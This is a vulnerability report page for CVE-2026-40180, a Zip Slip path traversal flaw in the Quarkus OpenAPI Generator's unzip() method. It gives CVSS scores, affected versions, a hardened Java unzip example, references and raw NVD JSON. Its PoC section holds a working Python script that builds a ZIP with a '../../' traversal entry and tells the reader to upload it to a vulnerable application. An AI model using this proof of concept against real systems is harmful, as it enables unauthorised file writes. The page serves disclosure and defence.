Security Vulnerability Report
CVE-2026-40180 CVSS 7.5 HIGH

Published: 2026-04-10 20:16:23
Last Modified: 2026-05-21 19:09:59

Description

Quarkus OpenAPI Generator is a set of Quarkus extensions for generating REST clients and server stubs. Prior to 2.16.0 and 2.15.0-lts, the unzip() method in ApicurioCodegenWrapper.java extracts ZIP entries without validating that the resolved file path stays within the intended output directory. At line 101, the destination is constructed as new File(toOutputDir, entry.getName()) and the content is written immediately, so a malicious ZIP archive containing entries with path traversal sequences (e.g., ../../malicious.java) would write files outside the target directory (Zip Slip, CWE-22). This vulnerability is fixed in 2.16.0 and 2.15.0-lts.
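Added illustration, not the project's code or its actual patch: a hardened unzip that canonicalises the output directory and refuses any entry whose normalised path leaves it, in contrast to the unvalidated new File(toOutputDir, entry.getName()) quoted above. The class and method names are assumptions, and the sample archive is constructed inline.

```java
import java.io.*;
import java.nio.file.*;
import java.util.zip.*;

public class SafeUnzip {
    // Hardened resolution (illustrative, not the project's patch). The vulnerable
    // version returns new File(toOutputDir, entry.getName()) and writes at once; here
    // the root is canonicalised, the entry path normalised, and anything that does
    // not stay under the root is refused. Absolute names fail too, since resolve()
    // returns them unchanged.
    static Path resolveEntry(File toOutputDir, ZipEntry entry) throws IOException {
        Path root = toOutputDir.getCanonicalFile().toPath();
        Path target = root.resolve(entry.getName()).normalize();
        if (!target.startsWith(root)) {
            throw new IOException("Zip entry escapes output directory: " + entry.getName());
        }
        return target;
    }

    static void unzip(InputStream in, File toOutputDir) throws IOException {
        try (ZipInputStream zis = new ZipInputStream(in)) {
            for (ZipEntry e; (e = zis.getNextEntry()) != null; zis.closeEntry()) {
                Path target = resolveEntry(toOutputDir, e); // validate before any write
                if (e.isDirectory()) {
                    Files.createDirectories(target);
                } else {
                    Files.createDirectories(target.getParent());
                    Files.copy(zis, target, StandardCopyOption.REPLACE_EXISTING);
                }
            }
        }
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample archive: a benign entry followed by a traversal entry.
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (ZipOutputStream zos = new ZipOutputStream(buf)) {
            zos.putNextEntry(new ZipEntry("gen/Client.java"));
            zos.write("// generated".getBytes());
            zos.putNextEntry(new ZipEntry("../../exploit_poc.txt"));
            zos.write("escaped".getBytes());
        }
        File out = Files.createTempDirectory("codegen-out").toFile();
        try {
            unzip(new ByteArrayInputStream(buf.toByteArray()), out);
        } catch (IOException ex) {
            System.out.println("Rejected: " + ex.getMessage()); // gen/Client.java was written
        }
    }
}
```

The check runs before any byte is written, so the benign entry is extracted and the traversal entry is refused with the entry name in the error message, which is the event worth logging on the generator side.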

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:quarkiverse:quarkus_openapi_generator:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:quarkiverse:quarkus_openapi_generator:2.15.0:*:*:*:-:*:*:* - VULNERABLE
Quarkus OpenAPI Generator < 2.16.0
Quarkus OpenAPI Generator < 2.15.0-lts

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import zipfile


def create_malicious_zip():
    """
    Proof of Concept for CVE-2026-40180.
    Generates a malicious ZIP file containing a path traversal entry.
    """
    zip_filename = "malicious_cve_2026_40180.zip"
    # The payload to write outside the intended directory
    payload_content = (
        b"MALICIOUS_PAYLOAD: If you see this file outside the extraction folder, "
        b"the system is vulnerable."
    )
    try:
        with zipfile.ZipFile(zip_filename, 'w') as zf:
            # Construct a filename with path traversal sequences (Zip Slip)
            # This attempts to write to the parent directory of the extraction point
            malicious_filename = "../../exploit_poc.txt"
            # Create ZipInfo to set metadata (optional, but good practice)
            zinfo = zipfile.ZipInfo(malicious_filename)
            # Write the payload
            zf.writestr(zinfo, payload_content)
        print(f"[+] Successfully created malicious ZIP file: {zip_filename}")
        print(f"[+] The file contains an entry named: {malicious_filename}")
        print("[+] Upload or trigger the processing of this file on the vulnerable Quarkus application.")
    except Exception as e:
        print(f"[-] Error creating ZIP file: {e}")


if __name__ == "__main__":
    create_malicious_zip()
```

References

https://github.com/quarkiverse/quarkus-openapi-generator/commit/08b406414ff30ed192e86c7fa924e57565534ff0 (Patch)
https://github.com/quarkiverse/quarkus-openapi-generator/commit/e2a9c629a3df719abc74569a3795c265fd0e1239 (Patch)
https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-jx2w-vp7f-456q (Exploit, Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-40180", "sourceIdentifier": "[email protected]", "published": "2026-04-10T20:16:23.260", "lastModified": "2026-05-21T19:09:58.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Quarkus OpenAPI Generator is Quarkus' extensions for generation of Rest Clients and server stubs generation. Prior to 2.16.0 and 2.15.0-lts, the unzip() method in ApicurioCodegenWrapper.java extracts ZIP entries without validating that the resolved file path stays within the intended output directory. At line 101, the destination is constructed as new File(toOutputDir, entry.getName()) and the content is written immediately. A malicious ZIP archive containing entries with path traversal sequences (e.g., ../../malicious.java) would write files outside the target directory. This vulnerability is fixed in 2.16.0 and 2.15.0-lts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quarkiverse:quarkus_openapi_generator:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.15.0", "matchCriteriaId": "E2C5131E-CD16-4C82-9C0A-D550F0860575"}, {"vulnerable": true, "criteria": "cpe:2.3:a:quarkiverse:quarkus_openapi_generator:2.15.0:*:*:*:-:*:*:*", "matchCriteriaId": "4E2B1037-3246-411E-BCF7-E800A6E3DDDD"}]}]}], "references": [{"url": "https://github.com/quarkiverse/quarkus-openapi-generator/commit/08b406414ff30ed192e86c7fa924e57565534ff0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/quarkiverse/quarkus-openapi-generator/commit/e2a9c629a3df719abc74569a3795c265fd0e1239", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-jx2w-vp7f-456q", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-jx2w-vp7f-456q", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
```